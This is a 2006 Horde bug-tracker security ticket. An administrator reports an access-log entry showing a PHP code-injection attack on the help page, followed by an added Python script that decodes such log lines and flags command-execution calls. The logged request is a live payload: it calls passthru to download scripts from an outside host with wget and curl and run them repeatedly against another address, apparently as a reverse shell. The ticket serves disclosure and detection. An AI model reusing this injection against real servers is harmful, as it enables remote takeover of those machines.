[Tickets #3856] NEW: security issue
bugs@bugs.horde.org
Sat Apr 29 18:44:58 PDT 2006
DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.
Ticket URL: http://bugs.horde.org/ticket/?id=3856
-----------------------------------------------------------------------
Ticket | 3856
Created By | admin at cw3host.com
Summary | security issue
Queue | IMP
Version | HEAD
State | Unconfirmed
Priority | 3. High
Type | Bug
Owners |
-----------------------------------------------------------------------
admin at cw3host.com (2006-04-29 18:44) wrote:
Found this in my logs after cleaning out hacker files in the TMP directory.
Server type is Red Hat Linux running H-Sphere.
/hsphere/shared/apache/htdocs//horde//services/help/index.php 216.65.11.137
- - [28/Apr/2006:10:00:12 -0500] "GET
//horde//services/help/?show=about&module=;\".passthru(\"wget%20http:\".chr(
47).\"\".chr(47).\"81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping.txt;mv%20p
ing.txt%20temp2006;perl%20temp2006%20217.160.242.90%20801;wget%20http:\".chr
(47).\"\".chr(47).\"81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping;chmod%20+
x%20ping;.\".chr(47).\"ping%20217.160.242.90%208081;curl%20-o%20ping%20http:
\".chr(47).\"\".chr(47).\"81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping;chm
od%20+x%20ping;.\".chr(47).\"ping%20217.160.242.90%208081;cd%20\".chr(47).\"
tmp\".chr(47).\";curl%20-o%20temp2006%20http:\".chr(47).\"\".chr(47).\"81.58
.26.26\".chr(47).\"libsh\".chr(47).\"ping.txt;while%20[%201%20];do%20perl%20
temp2006%20217.160.242.90%208081;done;wget%20http:\".chr(47).\"\".chr(47).\"
81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping;chmod%20+x%20ping;.\".chr(47)
.\"ping%20217.160.242.90%208081;curl%20-o%20ping%20http:\".chr(47).\"\".chr(
47).\"81.58.26.26\".chr(47).\"libsh\".chr(47).\"ping;chmod%20+x%20ping;.\".c
hr(47).\"ping%20217.160.242.90%208081\");'. HTTP/1.1" 200 3452 "-" "-"
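
A triage sketch for entries like the one above, added here as an example and not part of the ticket or of Horde's code: it URL-decodes the request target, resolves the ".chr(47)." joins back into "/", and reports any PHP command-execution call found in the query string together with the URLs it references. It assumes each log entry sits on a single line (mail wrapping undone); the pattern names, the function list and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request target, status and client address of an Apache access-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.*) HTTP/\d\.\d" (?P<status>\d{3})')
CLIENT_RE = re.compile(r'(\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[')
# PHP functions that run commands or code; they have no place in a query string.
EXEC_CALL_RE = re.compile(r'\b(passthru|system|exec|shell_exec|popen|proc_open|eval)\s*\(', re.I)
# "..." . chr(N) . "..." concatenation (Apache logs the quotes backslash-escaped).
CHR_CONCAT_RE = re.compile(r'\\?"\s*\.\s*chr\(\s*(\d{1,3})\s*\)\s*\.\s*\\?"', re.I)
URL_RE = re.compile(r'https?://[^\s;"\\\']+')

def deobfuscate(target):
    """URL-decode the request target and resolve each ".chr(N)." join."""
    return CHR_CONCAT_RE.sub(lambda m: chr(int(m.group(1))), unquote(target))

def scan(lines):
    """Return one finding per line whose request target contains a PHP exec call."""
    findings = []
    for line in lines:
        req = REQUEST_RE.search(line)
        if not req:
            continue
        target = deobfuscate(req.group("target"))
        call = EXEC_CALL_RE.search(target)
        if not call:
            continue
        client = CLIENT_RE.search(line)
        findings.append({
            "client": client.group(1) if client else None,
            "status": int(req.group("status")),
            "function": call.group(1).lower(),
            "urls": sorted(set(URL_RE.findall(target))),
        })
    return findings

# Constructed sample lines (documentation-range addresses), not taken from the ticket.
SAMPLE = [
    r'''198.51.100.7 - - [28/Apr/2006:10:00:12 -0500] "GET /horde/services/help/?show=about&module=;\".passthru(\"wget%20http:\".chr(47).\"\".chr(47).\"192.0.2.10\".chr(47).\"a.txt\");'. HTTP/1.1" 200 3452 "-" "-"''',
    '198.51.100.8 - - [28/Apr/2006:10:01:40 -0500] "GET /horde/services/help/?show=about&module=imp HTTP/1.1" 200 2911 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The status field shows only that the request was answered; whether the injected call actually ran has to be judged from the host itself, as the reporter did from the files left in the temp directory.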